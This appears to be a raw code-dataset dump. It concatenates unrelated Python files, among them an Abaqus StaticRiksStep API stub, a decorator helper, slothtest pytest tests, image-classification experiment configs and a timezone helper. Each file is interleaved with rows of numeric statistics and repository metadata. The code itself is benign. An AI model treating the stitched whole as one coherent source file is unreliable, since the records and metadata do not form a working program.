# - COUPLED_THERMAL_ELECTRICAL_STRUCTURAL
# - FREQUENCY
# - GEOSTATIC
# - HEAT_TRANSFER
# - MASS_DIFFUSION
# - MODAL_DYNAMICS
# - RANDOM_RESPONSE
# - RESPONSE_SPECTRUM
# - SOILS
# - STATIC_GENERAL
# - STATIC_LINEAR_PERTURBATION
# - STATIC_RIKS
# - STEADY_STATE_DIRECT
# - STEADY_STATE_MODAL
# - STEADY_STATE_SUBSPACE
# - VISCO
procedureType: SymbolicConstant = None
# A Boolean specifying whether the step is suppressed or not. The default value is OFF.
suppressed: Boolean = OFF
# A repository of FieldOutputRequestState objects.
fieldOutputRequestState: dict[str, FieldOutputRequestState] = dict[str, FieldOutputRequestState]()
# A repository of HistoryOutputRequestState objects.
historyOutputRequestState: dict[str, HistoryOutputRequestState] = dict[str, HistoryOutputRequestState]()
# A DiagnosticPrint object.
diagnosticPrint: DiagnosticPrint = DiagnosticPrint()
# A Monitor object.
monitor: Monitor = None
# A Restart object.
restart: Restart = Restart()
# A repository of AdaptiveMeshConstraintState objects.
adaptiveMeshConstraintStates: dict[str, AdaptiveMeshConstraintState] = dict[
str, AdaptiveMeshConstraintState]()
# A repository of AdaptiveMeshDomain objects.
adaptiveMeshDomains: dict[str, AdaptiveMeshDomain] = dict[str, AdaptiveMeshDomain]()
# A Control object.
control: Control = Control()
# A SolverControl object.
solverControl: SolverControl = SolverControl()
# A repository of BoundaryConditionState objects.
boundaryConditionStates: dict[str, BoundaryConditionState] = dict[str, BoundaryConditionState]()
# A repository of InteractionState objects.
interactionStates: int = None
# A repository of LoadState objects.
loadStates: dict[str, LoadState] = dict[str, LoadState]()
# A repository of LoadCase objects.
loadCases: dict[str, LoadCase] = dict[str, LoadCase]()
# A repository of PredefinedFieldState objects.
predefinedFieldStates: dict[str, PredefinedFieldState] = dict[str, PredefinedFieldState]()
def __init__(self, name: str, previous: str, description: str = '', nlgeom: Boolean = OFF,
adiabatic: Boolean = OFF, maxLPF: float = None, nodeOn: Boolean = OFF,
maximumDisplacement: float = 0, dof: int = 0, region: Region = Region(),
timeIncrementationMethod: SymbolicConstant = AUTOMATIC, maxNumInc: int = 100,
totalArcLength: float = 1, initialArcInc: float = None, minArcInc: float = None,
maxArcInc: float = None, matrixStorage: SymbolicConstant = SOLVER_DEFAULT,
extrapolation: SymbolicConstant = LINEAR, fullyPlastic: str = '', noStop: Boolean = OFF,
maintainAttributes: Boolean = False, useLongTermSolution: Boolean = OFF,
convertSDI: SymbolicConstant = PROPAGATED):
"""This method creates a StaticRiksStep object.
Notes
-----
This function can be accessed by:
.. code-block:: python
mdb.models[name].StaticRiksStep
Parameters
----------
name
A String specifying the repository key.
previous
A String specifying the name of the previous step. The new step appears after this step
in the list of analysis steps.
description
A String specifying a description of the new step. The default value is an empty string.
nlgeom
A Boolean specifying whether to allow for geometric nonlinearity. The default value is
OFF.
adiabatic
A Boolean specifying whether to perform an adiabatic stress analysis. The default value
is OFF.
maxLPF
None or a Float specifying the maximum value of the load proportionality factor. The
default value is None.
nodeOn
A Boolean specifying whether to monitor the finishing displacement value at a node. The
default value is OFF.
maximumDisplacement
A Float specifying the value of the total displacement (or rotation) at the node and
degree of freedom that, if crossed during an increment, ends the step at the current
increment. This argument is required when *nodeOn*=ON. The default value is 0.0.
dof
An Int specifying the degree of freedom being monitored. This argument is required when
*nodeOn*=ON. The default value is 0.
region
A Region object specifying the vertex at which the finishing displacement value is being
monitored. This argument is required when *nodeOn*=ON.
timeIncrementationMethod
A SymbolicConstant specifying the time incrementation method to be used. Possible values
are FIXED and AUTOMATIC. The default value is AUTOMATIC.
maxNumInc
An Int specifying the maximum number of increments in a step. The default value is 100.
totalArcLength
A Float specifying the total load proportionality factor associated with the load in
this step. The default value is 1.0.
initialArcInc
A Float specifying the initial load proportionality factor. The default value is the
total load proportionality factor for the step.
minArcInc
A Float specifying the minimum arc length increment allowed. The default value is the
smaller of the suggested initial load proportionality factor or 10−5 times the total
load proportionality factor for the step.
maxArcInc
A Float specifying the maximum arc length increment allowed. The default value is the
total load proportionality factor for the step.
matrixStorage
A SymbolicConstant specifying the type of matrix storage. Possible values are SYMMETRIC,
UNSYMMETRIC, and SOLVER_DEFAULT. The default value is SOLVER_DEFAULT.
extrapolation
A SymbolicConstant specifying the type of extrapolation to use in determining the
incremental solution for a nonlinear analysis. Possible values are NONE, LINEAR, and
PARABOLIC. The default value is LINEAR.
fullyPlastic
A String specifying the name of the region being monitored for fully Plastic behavior.
The default value is an empty string.
noStop
A Boolean specifying whether to accept the solution to an increment after the maximum
number of iterations allowed have been completed, even if the equilibrium tolerances are
not satisfied. The default value is OFF.Warning:You should set *noStop*=ON only in
special cases when you have a thorough understanding of how to interpret the results.
maintainAttributes
A Boolean specifying whether to retain attributes from an existing step with the same
name. The default value is False.
useLongTermSolution
A Boolean specifying wether to obtain the fully relaxed long-term elastic solution with
time-domain viscoelasticity or the long-term elastic-Plastic solution for two-layer
viscoplasticity. The default value is OFF.
convertSDI
A SymbolicConstant specifying whether to force a new iteration if severe discontinuities
occur during an iteration. Possible values are PROPAGATED, CONVERT_SDI_OFF, and
CONVERT_SDI_ON. The default value is PROPAGATED.
Returns
-------
A StaticRiksStep object.
Raises
------
RangeError
"""
super().__init__()
pass
def setValues(self, description: str = '', nlgeom: Boolean = OFF, adiabatic: Boolean = OFF,
maxLPF: float = None, nodeOn: Boolean = OFF, maximumDisplacement: float = 0,
dof: int = 0, region: Region = Region(),
timeIncrementationMethod: SymbolicConstant = AUTOMATIC, maxNumInc: int = 100,
totalArcLength: float = 1, initialArcInc: float = None, minArcInc: float = None,
maxArcInc: float = None, matrixStorage: SymbolicConstant = SOLVER_DEFAULT,
extrapolation: SymbolicConstant = LINEAR, fullyPlastic: str = '', noStop: Boolean = OFF,
useLongTermSolution: Boolean = OFF, convertSDI: SymbolicConstant = PROPAGATED):
"""This method modifies the StaticRiksStep object.
Parameters
----------
description
A String specifying a description of the new step. The default value is an empty string.
nlgeom
A Boolean specifying whether to allow for geometric nonlinearity. The default value is
OFF.
adiabatic
A Boolean specifying whether to perform an adiabatic stress analysis. The default value
is OFF.
maxLPF
None or a Float specifying the maximum value of the load proportionality factor. The
default value is None.
nodeOn
A Boolean specifying whether to monitor the finishing displacement value at a node. The
default value is OFF.
maximumDisplacement
A Float specifying the value of the total displacement (or rotation) at the node and
degree of freedom that, if crossed during an increment, ends the step at the current
increment. This argument is required when *nodeOn*=ON. The default value is 0.0.
dof
An Int specifying the degree of freedom being monitored. This argument is required when
*nodeOn*=ON. The default value is 0.
region
A Region object specifying the vertex at which the finishing displacement value is being
monitored. This argument is required when *nodeOn*=ON.
timeIncrementationMethod
A SymbolicConstant specifying the time incrementation method to be used. Possible values
are FIXED and AUTOMATIC. The default value is AUTOMATIC.
maxNumInc
An Int specifying the maximum number of increments in a step. The default value is 100.
totalArcLength
A Float specifying the total load proportionality factor associated with the load in
this step. The default value is 1.0.
initialArcInc
A Float specifying the initial load proportionality factor. The default value is the
total load proportionality factor for the step.
minArcInc
A Float specifying the minimum arc length increment allowed. The default value is the
smaller of the suggested initial load proportionality factor or 10−5 times the total
load proportionality factor for the step.
maxArcInc
A Float specifying the maximum arc length increment allowed. The default value is the
total load proportionality factor for the step.
matrixStorage
A SymbolicConstant specifying the type of matrix storage. Possible values are SYMMETRIC,
UNSYMMETRIC, and SOLVER_DEFAULT. The default value is SOLVER_DEFAULT.
extrapolation
A SymbolicConstant specifying the type of extrapolation to use in determining the
incremental solution for a nonlinear analysis. Possible values are NONE, LINEAR, and
PARABOLIC. The default value is LINEAR.
fullyPlastic
A String specifying the name of the region being monitored for fully Plastic behavior.
The default value is an empty string.
noStop
A Boolean specifying whether to accept the solution to an increment after the maximum
number of iterations allowed have been completed, even if the equilibrium tolerances are
not satisfied. The default value is OFF.Warning:You should set *noStop*=ON only in
special cases when you have a thorough understanding of how to interpret the results.
useLongTermSolution
A Boolean specifying wether to obtain the fully relaxed long-term elastic solution with
time-domain viscoelasticity or the long-term elastic-Plastic solution for two-layer
viscoplasticity. The default value is OFF.
convertSDI
A SymbolicConstant specifying whether to force a new iteration if severe discontinuities
occur during an iteration. Possible values are PROPAGATED, CONVERT_SDI_OFF, and
CONVERT_SDI_ON. The default value is PROPAGATED.
Raises
------
RangeError
"""
pass
| 49.738971
| 130
| 0.697834
| 3,128
| 27,058
| 6.006074
| 0.092072
| 0.030926
| 0.063076
| 0.071486
| 0.818598
| 0.77708
| 0.752009
| 0.728323
| 0.71805
| 0.717305
| 0
| 0.003086
| 0.257558
| 27,058
| 543
| 131
| 49.830571
| 0.931903
| 0.745177
| 0
| 0.126582
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025316
| false
| 0.025316
| 0.202532
| 0
| 0.759494
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
9d283bf91c893390124f6f8f26727b1eab86c82d
| 477
|
py
|
Python
|
tests/decorators.py
|
zvolsky/django-smoke-tests
|
049a6b92013c78f44c5ec9cb55d9978f391af3d7
|
[
"MIT"
] | 17
|
2017-12-04T15:18:16.000Z
|
2021-04-22T11:32:25.000Z
|
tests/decorators.py
|
zvolsky/django-smoke-tests
|
049a6b92013c78f44c5ec9cb55d9978f391af3d7
|
[
"MIT"
] | 19
|
2017-12-28T15:17:46.000Z
|
2022-03-30T12:38:16.000Z
|
tests/decorators.py
|
zvolsky/django-smoke-tests
|
049a6b92013c78f44c5ec9cb55d9978f391af3d7
|
[
"MIT"
] | 8
|
2017-12-28T12:31:09.000Z
|
2021-11-01T15:28:23.000Z
|
from functools import wraps
def decorator_without_functools_wraps(f):
def wrapper(request, *args, **kwargs):
if not request.user.is_superuser:
raise Exception
return f(request, *args, **kwargs)
return wrapper
def decorator_with_functools_wraps(f):
@wraps(f)
def wrapper(request, *args, **kwargs):
if not request.user.is_superuser:
raise Exception
return f(request, *args, **kwargs)
return wrapper
| 25.105263
| 42
| 0.656184
| 58
| 477
| 5.258621
| 0.362069
| 0.144262
| 0.222951
| 0.104918
| 0.727869
| 0.727869
| 0.727869
| 0.727869
| 0.727869
| 0.727869
| 0
| 0
| 0.249476
| 477
| 18
| 43
| 26.5
| 0.851955
| 0
| 0
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0
| 0.071429
| 0
| 0.642857
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9d2fad7e81e403963335945f309cce8e109830b1
| 2,545
|
py
|
Python
|
slothtest_tests/test.py
|
elegantwist/slothtest
|
0c5e5fa6f06c6089f6d1ac0e667d33abeda989bf
|
[
"MIT"
] | 12
|
2019-02-04T09:13:09.000Z
|
2019-04-17T07:02:54.000Z
|
slothtest_tests/test.py
|
elegantwist/slothtest
|
0c5e5fa6f06c6089f6d1ac0e667d33abeda989bf
|
[
"MIT"
] | null | null | null |
slothtest_tests/test.py
|
elegantwist/slothtest
|
0c5e5fa6f06c6089f6d1ac0e667d33abeda989bf
|
[
"MIT"
] | null | null | null |
import pytest
import os
import pandas as pd
from slothtest import watchme
from slothtest import slothwatcher
class ClassForTesting:
debugging = 99
def __init__(self, dd=0):
self.debugging = dd
@watchme()
def im_a_function_for_testing(self, d_table=None, vv=1):
for i, row in d_table.iterrows():
d_table['value'][i] = row['value'] * 10
return d_table, vv
@watchme()
def im_another_function_for_testing(d_table=None, vv=1):
for i, row in d_table.iterrows():
d_table['value'][i] = row['value'] * 10
return d_table, vv
def test_classmethod():
dirname = os.path.dirname(__file__)
d_data = [{'column': 1, 'value': 1},
{'column': 2, 'value': 2},
{'column': 3, 'value': 4}]
d_table = pd.DataFrame(d_data)
slothwatcher.start()
fn = ClassForTesting(12).im_a_function_for_testing(d_table, 2)
assert slothwatcher.dump_counter == 1
assert len(slothwatcher.data_watch_dump) == 1
assert len(slothwatcher.data_watch_dump[0]['function']) > 0
assert len(slothwatcher.data_watch_dump[0]['arguments']) == 3
assert len(slothwatcher.data_watch_dump[0]['results']) == 2
assert slothwatcher.data_watch_dump[0]['function']['class_name'] == 'ClassForTesting'
assert slothwatcher.data_watch_dump[0]['function']['function_name'] == 'im_a_function_for_testing'
assert slothwatcher.data_watch_dump[0]['function']['scope_name'] == 'test'
slothwatcher.stop()
assert os.path.isfile(os.path.join(dirname, slothwatcher.session_id + '.zip'))
def test_function():
dirname = os.path.dirname(__file__)
d_data = [{'column': 1, 'value': 1},
{'column': 2, 'value': 2},
{'column': 3, 'value': 4}]
d_table = pd.DataFrame(d_data)
slothwatcher.start()
fn = im_another_function_for_testing(d_table, 2)
assert slothwatcher.dump_counter == 1
assert len(slothwatcher.data_watch_dump) == 1
assert len(slothwatcher.data_watch_dump[0]['function']) > 0
assert len(slothwatcher.data_watch_dump[0]['arguments']) == 2
assert len(slothwatcher.data_watch_dump[0]['results']) == 2
assert slothwatcher.data_watch_dump[0]['function']['class_name'] == ''
assert slothwatcher.data_watch_dump[0]['function']['function_name'] == 'im_another_function_for_testing'
assert slothwatcher.data_watch_dump[0]['function']['scope_name'] == 'test'
slothwatcher.stop()
assert os.path.isfile(os.path.join(dirname, slothwatcher.session_id + '.zip'))
| 29.593023
| 108
| 0.670334
| 342
| 2,545
| 4.719298
| 0.192982
| 0.138786
| 0.182156
| 0.216853
| 0.848823
| 0.828996
| 0.828996
| 0.806691
| 0.806691
| 0.806691
| 0
| 0.022607
| 0.183104
| 2,545
| 85
| 109
| 29.941176
| 0.753728
| 0
| 0
| 0.618182
| 0
| 0
| 0.131631
| 0.022004
| 0
| 0
| 0
| 0
| 0.327273
| 1
| 0.090909
| false
| 0
| 0.090909
| 0
| 0.254545
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9d42dba2e36da3490c524ac95a75b46194999b80
| 108
|
py
|
Python
|
utils/get_time.py
|
ChrissisCodeXD/Hikari-TestProject
|
236c8fc9081172d9edff6d629e5d11c5abe64205
|
[
"MIT"
] | null | null | null |
utils/get_time.py
|
ChrissisCodeXD/Hikari-TestProject
|
236c8fc9081172d9edff6d629e5d11c5abe64205
|
[
"MIT"
] | null | null | null |
utils/get_time.py
|
ChrissisCodeXD/Hikari-TestProject
|
236c8fc9081172d9edff6d629e5d11c5abe64205
|
[
"MIT"
] | null | null | null |
import datetime, pytz
def get_time():
return datetime.datetime.now(tz=pytz.timezone('Europe/Berlin'))
| 18
| 67
| 0.740741
| 15
| 108
| 5.266667
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12037
| 108
| 5
| 68
| 21.6
| 0.831579
| 0
| 0
| 0
| 0
| 0
| 0.12037
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
19de8e324ff772ee03cacfddc8dfae3888e7bcd1
| 17,887
|
py
|
Python
|
vision/image_classification/configs/configs.py
|
pedro-abundio-wang/image-classification
|
952719d7561b9998add0daf71d61e55cb6103eaf
|
[
"Apache-2.0"
] | null | null | null |
vision/image_classification/configs/configs.py
|
pedro-abundio-wang/image-classification
|
952719d7561b9998add0daf71d61e55cb6103eaf
|
[
"Apache-2.0"
] | null | null | null |
vision/image_classification/configs/configs.py
|
pedro-abundio-wang/image-classification
|
952719d7561b9998add0daf71d61e55cb6103eaf
|
[
"Apache-2.0"
] | null | null | null |
# Lint as: python3
# ==============================================================================
"""Configuration utils for image classification experiments."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import dataclasses
from vision.image_classification import dataset_factory
from vision.image_classification.configs import base_configs
from vision.image_classification.alexnet import alexnet_config
from vision.image_classification.resnet import resnet_config
from vision.image_classification.inception import inception_config
from vision.image_classification.vgg import vgg_config
from vision.image_classification.squeeze import squeeze_config
from vision.image_classification.mobile import mobilenet_config
@dataclasses.dataclass()
class AlexNetImagenetConfig(base_configs.ExperimentConfig):
"""Base configuration to train alexnet on ImageNet."""
export: base_configs.ExportConfig = base_configs.ExportConfig()
runtime: base_configs.RuntimeConfig = base_configs.RuntimeConfig()
train_dataset: dataset_factory.DatasetConfig = \
dataset_factory.ImageNetConfig(split='train',
one_hot=False,
mean_subtract=True,
standardize=True)
validation_dataset: dataset_factory.DatasetConfig = \
dataset_factory.ImageNetConfig(split='validation',
one_hot=False,
mean_subtract=True,
standardize=True)
train: base_configs.TrainConfig = base_configs.TrainConfig(
resume_checkpoint=True,
epochs=90,
steps=None,
callbacks=base_configs.CallbacksConfig(enable_checkpoint_and_export=True,
enable_tensorboard=True),
metrics=['accuracy', 'top_5'],
time_history=base_configs.TimeHistoryConfig(log_steps=100),
tensorboard=base_configs.TensorboardConfig(track_lr=True,
write_model_weights=False))
evaluation: base_configs.EvalConfig = base_configs.EvalConfig(
epochs_between_evals=1,
steps=None)
model: base_configs.ModelConfig = alexnet_config.AlexNetModelConfig()
@dataclasses.dataclass
class ResNet18ImagenetConfig(base_configs.ExperimentConfig):
"""Base configuration to train resnet18 on ImageNet."""
export: base_configs.ExportConfig = base_configs.ExportConfig()
runtime: base_configs.RuntimeConfig = base_configs.RuntimeConfig()
train_dataset: dataset_factory.DatasetConfig = \
dataset_factory.ImageNetConfig(split='train',
one_hot=False,
mean_subtract=True,
standardize=True)
validation_dataset: dataset_factory.DatasetConfig = \
dataset_factory.ImageNetConfig(split='validation',
one_hot=False,
mean_subtract=True,
standardize=True)
train: base_configs.TrainConfig = base_configs.TrainConfig(
resume_checkpoint=True,
epochs=90,
steps=None,
callbacks=base_configs.CallbacksConfig(enable_checkpoint_and_export=True,
enable_tensorboard=True),
metrics=['accuracy', 'top_5'],
time_history=base_configs.TimeHistoryConfig(log_steps=100),
tensorboard=base_configs.TensorboardConfig(track_lr=True,
write_model_weights=False))
evaluation: base_configs.EvalConfig = base_configs.EvalConfig(
epochs_between_evals=1,
steps=None)
model: base_configs.ModelConfig = resnet_config.ResNet18ModelConfig()
@dataclasses.dataclass
class ResNet50ImagenetConfig(base_configs.ExperimentConfig):
"""Base configuration to train resnet50 on ImageNet."""
export: base_configs.ExportConfig = base_configs.ExportConfig()
runtime: base_configs.RuntimeConfig = base_configs.RuntimeConfig()
train_dataset: dataset_factory.DatasetConfig = \
dataset_factory.ImageNetConfig(split='train',
one_hot=False,
mean_subtract=True,
standardize=True)
validation_dataset: dataset_factory.DatasetConfig = \
dataset_factory.ImageNetConfig(split='validation',
one_hot=False,
mean_subtract=True,
standardize=True)
train: base_configs.TrainConfig = base_configs.TrainConfig(
resume_checkpoint=True,
epochs=90,
steps=None,
callbacks=base_configs.CallbacksConfig(enable_checkpoint_and_export=True,
enable_tensorboard=True),
metrics=['accuracy', 'top_5'],
time_history=base_configs.TimeHistoryConfig(log_steps=100),
tensorboard=base_configs.TensorboardConfig(track_lr=True,
write_model_weights=False))
evaluation: base_configs.EvalConfig = base_configs.EvalConfig(
epochs_between_evals=1,
steps=None)
model: base_configs.ModelConfig = resnet_config.ResNet50ModelConfig()
@dataclasses.dataclass
class InceptionV1ImagenetConfig(base_configs.ExperimentConfig):
"""Base configuration to train resnet-50 on ImageNet."""
export: base_configs.ExportConfig = base_configs.ExportConfig()
runtime: base_configs.RuntimeConfig = base_configs.RuntimeConfig()
train_dataset: dataset_factory.DatasetConfig = \
dataset_factory.ImageNetConfig(split='train',
one_hot=False,
mean_subtract=True,
standardize=True)
validation_dataset: dataset_factory.DatasetConfig = \
dataset_factory.ImageNetConfig(split='validation',
one_hot=False,
mean_subtract=True,
standardize=True)
train: base_configs.TrainConfig = base_configs.TrainConfig(
resume_checkpoint=True,
epochs=90,
steps=None,
callbacks=base_configs.CallbacksConfig(enable_checkpoint_and_export=True,
enable_tensorboard=True),
metrics=['accuracy', 'top_5'],
time_history=base_configs.TimeHistoryConfig(log_steps=100),
tensorboard=base_configs.TensorboardConfig(track_lr=True,
write_model_weights=False))
evaluation: base_configs.EvalConfig = base_configs.EvalConfig(
epochs_between_evals=1,
steps=None)
model: base_configs.ModelConfig = inception_config.GooglenetModelConfig()
@dataclasses.dataclass
class ResNet18V2ImagenetConfig(base_configs.ExperimentConfig):
"""Base configuration to train resnet18v2 on ImageNet."""
export: base_configs.ExportConfig = base_configs.ExportConfig()
runtime: base_configs.RuntimeConfig = base_configs.RuntimeConfig()
train_dataset: dataset_factory.DatasetConfig = \
dataset_factory.ImageNetConfig(split='train',
one_hot=False,
mean_subtract=True,
standardize=True)
validation_dataset: dataset_factory.DatasetConfig = \
dataset_factory.ImageNetConfig(split='validation',
one_hot=False,
mean_subtract=True,
standardize=True)
train: base_configs.TrainConfig = base_configs.TrainConfig(
resume_checkpoint=True,
epochs=90,
steps=None,
callbacks=base_configs.CallbacksConfig(enable_checkpoint_and_export=True,
enable_tensorboard=True),
metrics=['accuracy', 'top_5'],
time_history=base_configs.TimeHistoryConfig(log_steps=100),
tensorboard=base_configs.TensorboardConfig(track_lr=True,
write_model_weights=False))
evaluation: base_configs.EvalConfig = base_configs.EvalConfig(
epochs_between_evals=1,
steps=None)
model: base_configs.ModelConfig = resnet_config.ResNet18V2ModelConfig()
@dataclasses.dataclass
class ResNet50V2ImagenetConfig(base_configs.ExperimentConfig):
"""Base configuration to train resnet50v2 on ImageNet."""
export: base_configs.ExportConfig = base_configs.ExportConfig()
runtime: base_configs.RuntimeConfig = base_configs.RuntimeConfig()
train_dataset: dataset_factory.DatasetConfig = \
dataset_factory.ImageNetConfig(split='train',
one_hot=False,
mean_subtract=True,
standardize=True)
validation_dataset: dataset_factory.DatasetConfig = \
dataset_factory.ImageNetConfig(split='validation',
one_hot=False,
mean_subtract=True,
standardize=True)
train: base_configs.TrainConfig = base_configs.TrainConfig(
resume_checkpoint=True,
epochs=90,
steps=None,
callbacks=base_configs.CallbacksConfig(enable_checkpoint_and_export=True,
enable_tensorboard=True),
metrics=['accuracy', 'top_5'],
time_history=base_configs.TimeHistoryConfig(log_steps=100),
tensorboard=base_configs.TensorboardConfig(track_lr=True,
write_model_weights=False))
evaluation: base_configs.EvalConfig = base_configs.EvalConfig(
epochs_between_evals=1,
steps=None)
model: base_configs.ModelConfig = resnet_config.ResNet50V2ModelConfig()
@dataclasses.dataclass()
class Vgg16ImagenetConfig(base_configs.ExperimentConfig):
"""Base configuration to train Vgg16 on ImageNet."""
export: base_configs.ExportConfig = base_configs.ExportConfig()
runtime: base_configs.RuntimeConfig = base_configs.RuntimeConfig()
train_dataset: dataset_factory.DatasetConfig = \
dataset_factory.ImageNetConfig(split='train',
one_hot=False,
mean_subtract=True,
standardize=True)
validation_dataset: dataset_factory.DatasetConfig = \
dataset_factory.ImageNetConfig(split='validation',
one_hot=False,
mean_subtract=True,
standardize=True)
train: base_configs.TrainConfig = base_configs.TrainConfig(
resume_checkpoint=True,
epochs=90,
steps=None,
callbacks=base_configs.CallbacksConfig(enable_checkpoint_and_export=True,
enable_tensorboard=True),
metrics=['accuracy', 'top_5'],
time_history=base_configs.TimeHistoryConfig(log_steps=100),
tensorboard=base_configs.TensorboardConfig(track_lr=True,
write_model_weights=False))
evaluation: base_configs.EvalConfig = base_configs.EvalConfig(
epochs_between_evals=1,
steps=None)
model: base_configs.ModelConfig = vgg_config.Vgg16ModelConfig()
@dataclasses.dataclass()
class Vgg19ImagenetConfig(base_configs.ExperimentConfig):
"""Base configuration to train Vgg19 on ImageNet."""
export: base_configs.ExportConfig = base_configs.ExportConfig()
runtime: base_configs.RuntimeConfig = base_configs.RuntimeConfig()
train_dataset: dataset_factory.DatasetConfig = \
dataset_factory.ImageNetConfig(split='train',
one_hot=False,
mean_subtract=True,
standardize=True)
validation_dataset: dataset_factory.DatasetConfig = \
dataset_factory.ImageNetConfig(split='validation',
one_hot=False,
mean_subtract=True,
standardize=True)
train: base_configs.TrainConfig = base_configs.TrainConfig(
resume_checkpoint=True,
epochs=90,
steps=None,
callbacks=base_configs.CallbacksConfig(enable_checkpoint_and_export=True,
enable_tensorboard=True),
metrics=['accuracy', 'top_5'],
time_history=base_configs.TimeHistoryConfig(log_steps=100),
tensorboard=base_configs.TensorboardConfig(track_lr=True,
write_model_weights=False))
evaluation: base_configs.EvalConfig = base_configs.EvalConfig(
epochs_between_evals=1,
steps=None)
model: base_configs.ModelConfig = vgg_config.Vgg19ModelConfig()
@dataclasses.dataclass
class SqueezeNetImagenetConfig(base_configs.ExperimentConfig):
"""Base configuration to train SqueezeNet on ImageNet."""
export: base_configs.ExportConfig = base_configs.ExportConfig()
runtime: base_configs.RuntimeConfig = base_configs.RuntimeConfig()
train_dataset: dataset_factory.DatasetConfig = \
dataset_factory.ImageNetConfig(split='train',
one_hot=False,
mean_subtract=True,
standardize=True)
validation_dataset: dataset_factory.DatasetConfig = \
dataset_factory.ImageNetConfig(split='validation',
one_hot=False,
mean_subtract=True,
standardize=True)
train: base_configs.TrainConfig = base_configs.TrainConfig(
resume_checkpoint=True,
epochs=90,
steps=None,
callbacks=base_configs.CallbacksConfig(enable_checkpoint_and_export=True,
enable_tensorboard=True),
metrics=['accuracy', 'top_5'],
time_history=base_configs.TimeHistoryConfig(log_steps=100),
tensorboard=base_configs.TensorboardConfig(track_lr=True,
write_model_weights=False))
evaluation: base_configs.EvalConfig = base_configs.EvalConfig(
epochs_between_evals=1,
steps=None)
model: base_configs.ModelConfig = squeeze_config.SqueezeNetModelConfig()
@dataclasses.dataclass()
class MobileNetImagenetConfig(base_configs.ExperimentConfig):
"""Base configuration to train mobilenet on ImageNet."""
export: base_configs.ExportConfig = base_configs.ExportConfig()
runtime: base_configs.RuntimeConfig = base_configs.RuntimeConfig()
train_dataset: dataset_factory.DatasetConfig = \
dataset_factory.ImageNetConfig(split='train',
one_hot=False,
mean_subtract=True,
standardize=True)
validation_dataset: dataset_factory.DatasetConfig = \
dataset_factory.ImageNetConfig(split='validation',
one_hot=False,
mean_subtract=True,
standardize=True)
train: base_configs.TrainConfig = base_configs.TrainConfig(
resume_checkpoint=True,
epochs=90,
steps=None,
callbacks=base_configs.CallbacksConfig(enable_checkpoint_and_export=True,
enable_tensorboard=True),
metrics=['accuracy', 'top_5'],
time_history=base_configs.TimeHistoryConfig(log_steps=100),
tensorboard=base_configs.TensorboardConfig(track_lr=True,
write_model_weights=False))
evaluation: base_configs.EvalConfig = base_configs.EvalConfig(
epochs_between_evals=1,
steps=None)
model: base_configs.ModelConfig = mobilenet_config.MobileNetModelConfig()
def get_config(model: str, dataset: str) -> base_configs.ExperimentConfig:
"""Given model and dataset names, return the ExperimentConfig."""
dataset_model_config_map = {
'imagenet': {
'alexnet': AlexNetImagenetConfig(),
'resnet18': ResNet18ImagenetConfig(),
'resnet50': ResNet50ImagenetConfig(),
'inceptionV1': InceptionV1ImagenetConfig(),
'resnet18v2': ResNet18V2ImagenetConfig(),
'resnet50v2': ResNet50V2ImagenetConfig(),
'vgg16': Vgg16ImagenetConfig(),
'vgg19': Vgg19ImagenetConfig(),
'squeeze': SqueezeNetImagenetConfig(),
'mobile': MobileNetImagenetConfig(),
}
}
try:
return dataset_model_config_map[dataset][model]
except KeyError:
if dataset not in dataset_model_config_map:
raise KeyError('Invalid dataset received. Received: {}. Supported '
'datasets include: {}'.format(dataset, ', '.join(dataset_model_config_map.keys())))
raise KeyError('Invalid model received. Received: {}. Supported models for'
'{} include: {}'.format(model, dataset, ', '.join(dataset_model_config_map[dataset].keys())))
| 50.528249
| 116
| 0.613854
| 1,517
| 17,887
| 6.963085
| 0.090969
| 0.137461
| 0.043548
| 0.064376
| 0.822683
| 0.802802
| 0.796743
| 0.748462
| 0.748462
| 0.748462
| 0
| 0.01179
| 0.30771
| 17,887
| 353
| 117
| 50.671388
| 0.841234
| 0.039973
| 0
| 0.825397
| 0
| 0
| 0.029866
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.003175
| false
| 0
| 0.038095
| 0
| 0.298413
| 0.003175
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c2098c3f86f8a565346738dc2270bf0d01ba9106
| 208
|
py
|
Python
|
core/textsummarize.py
|
tonymazn/cs410
|
6abcd5762a1e5b131220651d2a82e6fac29b55fe
|
[
"Apache-2.0"
] | null | null | null |
core/textsummarize.py
|
tonymazn/cs410
|
6abcd5762a1e5b131220651d2a82e6fac29b55fe
|
[
"Apache-2.0"
] | null | null | null |
